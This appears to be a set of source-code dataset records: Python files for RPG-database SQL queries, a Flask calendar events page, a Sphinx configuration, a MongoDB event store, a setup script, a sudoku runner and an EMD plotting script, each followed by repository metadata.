# (SELECT COUNT(*) FROM charactercreator_thief) AS thiefs,
# (SELECT COUNT(*) FROM charactercreator_cleric) AS clerics,
# (SELECT COUNT(*) FROM charactercreator_fighter) AS fighters;
# """
CLASS = "SELECT COUNT(*) FROM charactercreator_"
# How many total Items? (174)
TOTAL_ITEMS = """
SELECT COUNT(item_id) as items
FROM armory_item;
"""
# How many of the Items are weapons? (37)
WEAPONS = """
SELECT COUNT(item_ptr_id)
FROM armory_weapon;
"""
# How many of the items are not weapons? (137)
NON_WEAPONS = """
SELECT COUNT(items.name)
FROM armory_item as items
WHERE items.item_id NOT IN(
SELECT armory_weapon.item_ptr_id
FROM armory_weapon);
"""
# How many Items does each character have? (Return first 20 rows)
CHARACTER_ITEMS = """
SELECT character.name as "character_name", COUNT(inventory.id) as "#_of_items"
FROM charactercreator_character AS character, charactercreator_character_inventory AS inventory
WHERE character.character_id = inventory.character_id
GROUP BY character.name
ORDER BY character.name
LIMIT 20;
"""
# How many Weapons does each character have? (Return first 20 rows)
CHARACTER_WEAPONS = """
SELECT character.name as "character_name", COUNT(weapon.item_ptr_id) as "#_of_weapons"
FROM charactercreator_character AS character, charactercreator_character_inventory AS inventory, armory_weapon as weapon
WHERE character.character_id = inventory.character_id AND inventory.item_id = weapon.item_ptr_id
GROUP BY character.name
ORDER BY character.name
LIMIT 20;
"""
# On average, how many Items does each Character have? (3.02)
AVG_CHARACTER_ITEMS = """
SELECT
AVG("#_of_items") as "avg_#_of_items"
FROM
(
SELECT
COUNT(inventory.id) AS "#_of_items"
FROM
charactercreator_character AS character,
charactercreator_character_inventory AS inventory
WHERE
character.character_id = inventory.character_id
GROUP BY character.name
);
"""
# On average, how many Weapons does each character have? (0.67)
AVG_CHARACTER_WEAPONS = """
SELECT
AVG(weapon_count) as avg_weapons_per_char
FROM (
SELECT
character.character_id,
COUNT(DISTINCT weapon.item_ptr_id) as weapon_count
FROM
charactercreator_character AS character
LEFT JOIN charactercreator_character_inventory inventory -- characters may have zero items
ON character.character_id = inventory.character_id
LEFT JOIN armory_weapon weapon -- many items are not weapons, so only retain weapons
ON inventory.item_id = weapon.item_ptr_id
GROUP BY character.character_id
) subq;
"""
| 28.941176 | 120 | 0.774051 | 404 | 2,952 | 5.445545 | 0.195545 | 0.109091 | 0.079545 | 0.084545 | 0.530455 | 0.464091 | 0.430909 | 0.337727 | 0.308636 | 0.265909 | 0 | 0.009827 | 0.138211 | 2,952 | 101 | 121 | 29.227723 | 0.854953 | 0.300474 | 0 | 0.328358 | 0 | 0 | 0.882353 | 0.267647 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
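These constants are plain SQL strings meant to run against the course's RPG SQLite database. A minimal sketch with the stdlib driver; `rpg_db.sqlite3` is a hypothetical stand-in for the actual database file:

```python
import sqlite3

from query import CHARACTER_ITEMS, TOTAL_CHARACTERS  # the module above

conn = sqlite3.connect('rpg_db.sqlite3')  # hypothetical file name
curs = conn.cursor()

print(curs.execute(TOTAL_CHARACTERS).fetchone()[0])  # expected: 302
for name, n_items in curs.execute(CHARACTER_ITEMS).fetchall():
    print(name, n_items)  # first 20 characters and their item counts
```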
hexsha: 6ac7d878414c23d75e260d1c447ced1efb264340 | size: 2,420 | ext: py | lang: Python
max_stars: path=events_page/app.py | repo=los-verdes/lv-event-pagenerator | head=88416b626ff2dca6e2d71fa60bff4823954b3131 | licenses=["MIT"] | count=null | events=null
max_issues: path=events_page/app.py | repo=los-verdes/lv-event-pagenerator | head=88416b626ff2dca6e2d71fa60bff4823954b3131 | licenses=["MIT"] | count=7 | events=2022-01-16T15:36:40.000Z to 2022-01-25T22:02:12.000Z
max_forks: path=events_page/app.py | repo=los-verdes/lv-event-pagenerator | head=88416b626ff2dca6e2d71fa60bff4823954b3131 | licenses=["MIT"] | count=null | events=null
content:
#!/usr/bin/env python
from zoneinfo import ZoneInfo
import flask
from dateutil.parser import parse
from flask_assets import Bundle, Environment
from logzero import logger, setup_logger
from webassets.filter import get_filter
from config import cfg
from apis import calendar as gcal
setup_logger(name=__name__)
app = flask.Flask(__name__)
libsass = get_filter(
"libsass",
as_output=True,
style="compressed",
)
assets = Environment(app) # create an Environment instance
bundles = { # define nested Bundle
"style": Bundle(
"scss/*.scss",
filters=(libsass),
output="style.css",
)
}
assets.register(bundles)
@app.route("/")
def events():
return flask.render_template(
"index.html",
calendar=gcal.load_calendar(
service=gcal.build_service(),
calendar_id=cfg.calendar_id,
),
)
@app.template_filter()
def parse_tz_datetime(datetime_str):
return parse(datetime_str).replace(tzinfo=ZoneInfo(app.config["display_timezone"]))
@app.template_filter()
def replace_tz(datetime_obj):
return datetime_obj.replace(tzinfo=ZoneInfo(app.config["display_timezone"]))
@app.template_filter()
def hex2rgb(hex, alpha=None):
"""Convert a hex color string to an rgb()/rgba() CSS value."""
if not hex.startswith("#"):
return hex
h = hex.lstrip("#")
try:
rgb = tuple(int(h[i : i + 2], 16) for i in (0, 2, 4)) # noqa
except Exception as err:
logger.exception(f"unable to convert {hex=} to rgb: {err}")
return h
if alpha is None:
return f"rgb({rgb[0]}, {rgb[1]}, {rgb[2]})"
else:
return f"rgba({rgb[0]}, {rgb[1]}, {rgb[2]}, {alpha})"
def get_base_url():
if prefix := cfg.gcs_bucket_prefix:
return f"https://{cfg.hostname}/{prefix}"
return f"https://{cfg.hostname}"
def create_app():
cfg.load()
# TODO: do this default settings thing better?
default_app_config = dict(
display_timezone=cfg.display_timezone,
FREEZER_BASE_URL=get_base_url(),
FREEZER_STATIC_IGNORE=["*.scss", ".webassets-cache/*", ".DS_Store"],
FREEZER_RELATIVE_URLS=False,
FREEZER_REMOVE_EXTRA_FILES=True,
)
logger.info(f"create_app() => {default_app_config=}")
app.config.update(default_app_config)
return app
if __name__ == "__main__":
app = create_app()
app.run(
host="0.0.0.0",
debug=True,
)
| 24.444444 | 87 | 0.648347 | 319 | 2,420 | 4.711599 | 0.413793 | 0.035928 | 0.033932 | 0.03992 | 0.141051 | 0.141051 | 0.086494 | 0.086494 | 0.086494 | 0.086494 | 0 | 0.008952 | 0.215289 | 2,420 | 98 | 88 | 24.693878 | 0.782517 | 0.06281 | 0 | 0.04 | 0 | 0 | 0.150133 | 0.0093 | 0 | 0 | 0 | 0.010204 | 0 | 1 | 0.08 | false | 0 | 0.106667 | 0.04 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
effective: 0 | hits: 1
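The `hex2rgb` filter is the only non-trivial logic here; its conversion is easy to sanity-check standalone (values below worked out by hand from `int(h[i:i + 2], 16)`):

```python
h = '22aa55'  # an arbitrary example color, minus the leading '#'
rgb = tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))

print(rgb)                                         # (34, 170, 85)
print(f'rgba({rgb[0]}, {rgb[1]}, {rgb[2]}, 0.5)')  # 'rgba(34, 170, 85, 0.5)'
```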
hexsha: 6aca7a5f520c3a19c81c989f925529d891ca4d67 | size: 661 | ext: py | lang: Python
max_stars: path=_doc/sphinxdoc/source/conf.py | repo=Jerome-maker/ensae_teaching_cs | head=43ea044361ee60c00c85aea354a7b25c21c0fd07 | licenses=["MIT"] | count=null | events=null
max_issues: path=_doc/sphinxdoc/source/conf.py | repo=Jerome-maker/ensae_teaching_cs | head=43ea044361ee60c00c85aea354a7b25c21c0fd07 | licenses=["MIT"] | count=null | events=null
max_forks: path=_doc/sphinxdoc/source/conf.py | repo=Jerome-maker/ensae_teaching_cs | head=43ea044361ee60c00c85aea354a7b25c21c0fd07 | licenses=["MIT"] | count=null | events=null
content:
import sys
import os
import sphinx_rtd_theme
source_path = os.path.normpath(
os.path.join(
os.path.abspath(
os.path.split(__file__)[0])))
try:
from conf_base import *
except ImportError:
sys.path.append(source_path)
from conf_base import *
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
templates_path = [os.path.join(source_path, 'phdoc_static')]
html_static_path = [os.path.join(source_path, 'phdoc_static')]
if not os.path.exists(templates_path[0]):
raise FileNotFoundError(templates_path[0])
blog_root = "http://www.xavierdupre.fr/app/ensae_teaching_cs/helpsphinx3/"
| 25.423077 | 74 | 0.741301 | 98 | 661 | 4.673469 | 0.428571 | 0.091703 | 0.091703 | 0.078603 | 0.152838 | 0.152838 | 0.152838 | 0.152838 | 0 | 0 | 0 | 0.00703 | 0.139183 | 661 | 25 | 75 | 26.44 | 0.797891 | 0 | 0 | 0.105263 | 0 | 0 | 0.151286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
6acc395ad3bfafbc612c2d532d32bbb5ce80e13f
| 4,123 |
py
|
Python
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
lisy09/flink-ai-extended
|
011a5a332f7641f66086653e715d0596eab2e107
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-08-06T04:24:36.000Z
|
2021-08-06T04:24:36.000Z
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2021-05-20T02:17:11.000Z
|
2021-05-20T02:17:11.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import socket
from collections.abc import Iterable
from typing import Union, Tuple
from mongoengine import connect
from notification_service.event_storage import BaseEventStorage
from notification_service.base_notification import BaseEvent
from notification_service.mongo_notification import MongoEvent
class MongoEventStorage(BaseEventStorage):
def __init__(self, *args, **kwargs):
self.db_conn = self.setup_connection(**kwargs)
self.server_ip = socket.gethostbyname(socket.gethostname())
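    # Build the MongoDB connection; username and password are optional but must be supplied together.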
def setup_connection(self, **kwargs):
db_conf = {
"host": kwargs.get("host"),
"port": kwargs.get("port"),
"db": kwargs.get("db"),
}
username = kwargs.get("username", None)
password = kwargs.get("password", None)
authentication_source = kwargs.get("authentication_source", "admin")
        if (username or password) and not (username and password):
            raise ValueError("username and password must be provided together")
if username and password:
db_conf.update({
"username": username,
"password": password,
"authentication_source": authentication_source
})
return connect(**db_conf)
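    # Return the highest stored version for the key, or 0 if no events exist.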
def get_latest_version(self, key: str, namespace: str = None):
mongo_events = MongoEvent.get_by_key(key, 0, 1, "-version")
if not mongo_events:
return 0
return mongo_events[0].version
def add_event(self, event: BaseEvent, uuid: str):
kwargs = {
"server_ip": self.server_ip,
"create_time": int(time.time() * 1000),
"event_type": event.event_type,
"key": event.key,
"value": event.value,
"context": event.context,
"namespace": event.namespace,
"sender": event.sender,
"uuid": uuid
}
mongo_event = MongoEvent(**kwargs)
mongo_event.save()
mongo_event.reload()
event.create_time = mongo_event.create_time
event.version = mongo_event.version
return event
def list_events(self,
key: Union[str, Tuple[str]],
version: int = None,
event_type: str = None,
start_time: int = None,
namespace: str = None,
sender: str = None):
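        # Treat empty strings (and a zero version) as "no filter".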
key = None if key == "" else key
version = None if version == 0 else version
event_type = None if event_type == "" else event_type
namespace = None if namespace == "" else namespace
sender = None if sender == "" else sender
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
res = MongoEvent.get_base_events(key, version, event_type, start_time, namespace, sender)
return res
def list_all_events(self, start_time: int):
res = MongoEvent.get_base_events_by_time(start_time)
return res
def list_all_events_from_version(self, start_version: int, end_version: int = None):
res = MongoEvent.get_base_events_by_version(start_version, end_version)
return res
def clean_up(self):
MongoEvent.delete_by_client(self.server_ip)
| 38.175926 | 97 | 0.64031 | 494 | 4,123 | 5.192308 | 0.311741 | 0.024561 | 0.026901 | 0.023392 | 0.051462 | 0.041326 | 0 | 0 | 0 | 0 | 0 | 0.004329 | 0.271647 | 4,123 | 107 | 98 | 38.53271 | 0.849817 | 0.182391 | 0 | 0.037975 | 0 | 0 | 0.063544 | 0.01253 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101266 | false | 0.063291 | 0.101266 | 0 | 0.303797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6accba984dd52f022ed6544e1f7ad42db7180437
| 665 |
py
|
Python
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 15 |
2017-08-24T18:44:55.000Z
|
2021-02-01T22:07:53.000Z
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 5 |
2017-09-05T12:25:09.000Z
|
2021-10-18T06:45:24.000Z
|
setup.py
|
rrwen/search_google
|
e647868ba5da2803e787a3c06b32e09452068736
|
[
"MIT"
] | 1 |
2018-02-20T13:44:44.000Z
|
2018-02-20T13:44:44.000Z
|
# -*- coding: utf-8 -*-
from setuptools import setup
import search_google as package
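# Long description: reuse README.rst, skipping its first 11 lines.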
def readme():
with open('README.rst') as f:
return ''.join(f.readlines()[11:])
setup(
name=package.__name__,
version=package.__version__,
description=package.__description__,
long_description=readme(),
author=package.__author__,
author_email=package.__email__,
license=package.__license__,
url=package.__url__,
download_url=package.__download_url__,
    keywords=package.__keywords__,
entry_points=package.__entry_points__,
packages=package.__packages__,
package_data=package.__package_data__,
install_requires=package.__install_requires__
)
| 24.62963 | 47 | 0.771429 | 77 | 665 | 5.844156 | 0.480519 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005119 | 0.118797 | 665 | 26 | 48 | 25.576923 | 0.762799 | 0.031579 | 0 | 0 | 0 | 0 | 0.015576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | true | 0 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6ad2141e919181f75e53ccffa43344d1aae6eea7
| 346 |
py
|
Python
|
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
main.py
|
BenG49/sudoku
|
e4b14655e23d04c161feb16ceb1338537f519bdb
|
[
"MIT"
] | null | null | null |
from sudoku import Sudoku
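# Parse a puzzle from its ASCII grid, solve it, and print both.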
def main():
s = Sudoku.parse(
'''
-------------
| |2 | |
| | 6 |4 3|
| | 5| 7 |
-------------
| 7 | 2|8 |
|51 | 4|9 |
| 9| 3| |
-------------
| | 9| |
| 2| | 98|
| 83|1 |2 |
-------------
'''
)
print(s)
print(s.solve())
if __name__ == '__main__':
main()
| 12.814815 | 26 | 0.297688 | 38 | 346 | 2.5 | 0.605263 | 0.126316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105505 | 0.369942 | 346 | 26 | 27 | 13.307692 | 0.330275 | 0 | 0 | 0 | 0 | 0 | 0.062016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6adc3f2423ac6cf2c778f44e1751ae2e595e05f5
| 74,159 |
py
|
Python
|
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
jss_figures_replication_script.py
|
Cole-vJ/AdvEMDpy
|
160cd44b371a2c8aa66961f23062c1d7305dd728
|
[
"Unlicense"
] | null | null | null |
# ________
# /
# \ /
# \ /
# \/
import random
import textwrap
import emd_mean
import AdvEMDpy
import emd_basis
import emd_utils
import numpy as np
import pandas as pd
import cvxpy as cvx
import seaborn as sns
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from scipy.ndimage import gaussian_filter
from emd_utils import time_extension, Utility
from scipy.interpolate import CubicSpline
from emd_hilbert import Hilbert, hilbert_spectrum
from emd_preprocess import Preprocess
from emd_mean import Fluctuation
from AdvEMDpy import EMD
# alternate packages
from PyEMD import EMD as pyemd0215
import emd as emd040
sns.set(style='darkgrid')
pseudo_alg_time = np.linspace(0, 2 * np.pi, 1001)
pseudo_alg_time_series = np.sin(pseudo_alg_time) + np.sin(5 * pseudo_alg_time)
pseudo_utils = Utility(time=pseudo_alg_time, time_series=pseudo_alg_time_series)
# plot 0 - addition
fig = plt.figure(figsize=(9, 4))
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('First Iteration of Sifting Algorithm')
plt.plot(pseudo_alg_time, pseudo_alg_time_series, label=r'$h_{(1,0)}(t)$', zorder=1)
plt.scatter(pseudo_alg_time[pseudo_utils.max_bool_func_1st_order_fd()],
pseudo_alg_time_series[pseudo_utils.max_bool_func_1st_order_fd()],
c='r', label=r'$M(t_i)$', zorder=2)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time) + 1, '--', c='r', label=r'$\tilde{h}_{(1,0)}^M(t)$', zorder=4)
plt.scatter(pseudo_alg_time[pseudo_utils.min_bool_func_1st_order_fd()],
pseudo_alg_time_series[pseudo_utils.min_bool_func_1st_order_fd()],
c='c', label=r'$m(t_j)$', zorder=3)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time) - 1, '--', c='c', label=r'$\tilde{h}_{(1,0)}^m(t)$', zorder=5)
plt.plot(pseudo_alg_time, np.sin(pseudo_alg_time), '--', c='purple', label=r'$\tilde{h}_{(1,0)}^{\mu}(t)$', zorder=5)
plt.yticks(ticks=[-2, -1, 0, 1, 2])
plt.xticks(ticks=[0, np.pi, 2 * np.pi],
labels=[r'0', r'$\pi$', r'$2\pi$'])
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.95, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/pseudo_algorithm.png')
plt.show()
knots = np.arange(12)
time = np.linspace(0, 11, 1101)
basis = emd_basis.Basis(time=time, time_series=time)
b_spline_basis = basis.cubic_b_spline(knots)
chsi_basis = basis.chsi_basis(knots)
# plot 1
plt.title('Non-Natural Cubic B-Spline Bases at Boundary')
plt.plot(time[500:], b_spline_basis[2, 500:].T, '--', label=r'$ B_{-3,4}(t) $')
plt.plot(time[500:], b_spline_basis[3, 500:].T, '--', label=r'$ B_{-2,4}(t) $')
plt.plot(time[500:], b_spline_basis[4, 500:].T, '--', label=r'$ B_{-1,4}(t) $')
plt.plot(time[500:], b_spline_basis[5, 500:].T, '--', label=r'$ B_{0,4}(t) $')
plt.plot(time[500:], b_spline_basis[6, 500:].T, '--', label=r'$ B_{1,4}(t) $')
plt.xticks([5, 6], [r'$ \tau_0 $', r'$ \tau_1 $'])
plt.xlim(4.4, 6.6)
plt.plot(5 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
plt.plot(6 * np.ones(100), np.linspace(-0.2, 1.2, 100), 'k-')
plt.legend(loc='upper left')
plt.savefig('jss_figures/boundary_bases.png')
plt.show()
# plot 1a - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
knots_uniform = np.linspace(0, 2 * np.pi, 51)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs = emd.empirical_mode_decomposition(knots=knots_uniform, edge_effect='anti-symmetric', verbose=False)[0]
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Uniform Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Uniform Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Uniform Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots_uniform[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots_uniform)):
axs[i].plot(knots_uniform[j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_uniform.png')
plt.show()
# plot 1b - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs, _, _, _, knots, _, _ = emd.empirical_mode_decomposition(edge_effect='anti-symmetric',
optimise_knots=1, verbose=False)
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Statically Optimised Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Statically Optimised Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Statically Optimised Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots[0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots)):
axs[i].plot(knots[j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_1.png')
plt.show()
# plot 1c - addition
knot_demonstrate_time = np.linspace(0, 2 * np.pi, 1001)
knot_demonstrate_time_series = np.sin(knot_demonstrate_time) + np.sin(5 * knot_demonstrate_time)
emd = EMD(time=knot_demonstrate_time, time_series=knot_demonstrate_time_series)
imfs, _, _, _, knots, _, _ = emd.empirical_mode_decomposition(edge_effect='anti-symmetric',
optimise_knots=2, verbose=False)
fig, axs = plt.subplots(3, 1)
fig.subplots_adjust(hspace=0.6)
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Time Series and Dynamically Optimised Knots')
axs[0].plot(knot_demonstrate_time, knot_demonstrate_time_series, linewidth=2, zorder=100)
axs[0].set_yticks(ticks=[-2, 0, 2])
axs[0].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[0].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[1].set_title('IMF 1 and Dynamically Optimised Knots')
axs[1].plot(knot_demonstrate_time, imfs[1, :], linewidth=2, zorder=100)
axs[1].set_yticks(ticks=[-2, 0, 2])
axs[1].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[1].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[2].set_title('IMF 2 and Dynamically Optimised Knots')
axs[2].plot(knot_demonstrate_time, imfs[2, :], linewidth=2, zorder=100)
axs[2].set_yticks(ticks=[-2, 0, 2])
axs[2].set_xticks(ticks=[0, np.pi, 2 * np.pi])
axs[2].set_xticklabels(labels=['0', r'$\pi$', r'$2\pi$'])
axs[0].plot(knots[0][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[0].legend(loc='lower left')
axs[1].plot(knots[1][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
axs[2].plot(knots[2][0] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey', label='Knots')
for i in range(3):
for j in range(1, len(knots[i])):
axs[i].plot(knots[i][j] * np.ones(101), np.linspace(-2, 2, 101), '--', c='grey')
plt.savefig('jss_figures/knot_2.png')
plt.show()
# plot 1d - addition
window = 81
fig, axs = plt.subplots(2, 1)
fig.subplots_adjust(hspace=0.4)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
axs[0].set_title('Preprocess Filtering Demonstration')
axs[1].set_title('Zoomed Region')
preprocess_time = pseudo_alg_time.copy()
np.random.seed(1)
random.seed(1)
preprocess_time_series = pseudo_alg_time_series + np.random.normal(0, 0.1, len(preprocess_time))
for i in random.sample(range(1000), 500):
preprocess_time_series[i] += np.random.normal(0, 1)
preprocess = Preprocess(time=preprocess_time, time_series=preprocess_time_series)
axs[0].plot(preprocess_time, preprocess_time_series, label='x(t)')
axs[0].plot(pseudo_alg_time, pseudo_alg_time_series, '--', c='purple',
label=textwrap.fill('Noiseless time series', 12))
axs[0].plot(preprocess_time, preprocess.mean_filter(window_width=window)[1], label=textwrap.fill('Mean filter', 12))
axs[0].plot(preprocess_time, preprocess.median_filter(window_width=window)[1], label=textwrap.fill('Median filter', 13))
axs[0].plot(preprocess_time, preprocess.winsorize(window_width=window, a=0.8)[1], label=textwrap.fill('Winsorize filter', 12))
axs[0].plot(preprocess_time, preprocess.winsorize_interpolate(window_width=window, a=0.8)[1],
            label=textwrap.fill('Winsorize interpolation filter', 14))
axs[0].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.90)[1], c='grey',
label=textwrap.fill('Quantile window', 12))
axs[0].plot(preprocess_time, preprocess.quantile_filter(window_width=window, q=0.10)[1], c='grey')
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), -3 * np.ones(101), '--', c='black',
label=textwrap.fill('Zoomed region', 10))
axs[0].plot(np.linspace(0.85 * np.pi, 1.15 * np.pi, 101), 3 * np.ones(101), '--', c='black')
